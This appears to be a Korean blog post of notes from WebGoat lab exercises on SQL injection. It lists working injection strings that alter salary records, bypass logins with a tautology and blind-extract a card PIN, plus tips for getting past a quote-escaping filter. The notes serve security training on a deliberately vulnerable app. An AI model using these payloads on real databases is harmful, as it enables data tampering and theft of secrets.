How to work with WebGoat
aaa'; UPDATE salaries SET salary=999 WHERE userid='jsmith
bbb'; INSERT INTO salaries (userid, salary) VALUES('DDDD', 333333)--
User ID: 101
101; update employee set salary=10000
101; update employee set salary=10000where userid=101
또는
101 update employee set salary=10000 where userid=101
101 update employee set salary= 10000
Smith' or '1'='1
Blind Numeric SQL Injection
101 AND ((SELECT pin FROM pins WHERE cc_number='111222333444')>10000);
빨간 숫자 부분을 계속 바꿔보기`
2363 - 2364
입력필터 회피하기_필터3
인용부호가 있을 때,애플리케이션은 추가적인 인용부호를 기존 인용부호에 덧붙임. - 사용자 입력 값에 두 개의 인용부호가 있을 때, 인용부호 회피 마크로 인식돼서 무시됨
인용부호 2개('') = 회피마크 = 없는 것으로 간주
-> 사용자 1개, 시스템 1개 합쳐진 형식
유저 네임 입력값에 대한 제한 - 10개 문자
'보안 > 웹' 카테고리의 다른 글
| [RAON CTF] XSS (Cross-site scripting) (0) | 2023.06.08 |
|---|---|
| [RAON CTF] Protocol (0) | 2023.06.08 |
| 20230508 (0) | 2023.05.08 |
| PHP 함수 정리 (0) | 2023.04.23 |
| 5. SQL Injection 공격 (0) | 2023.04.10 |
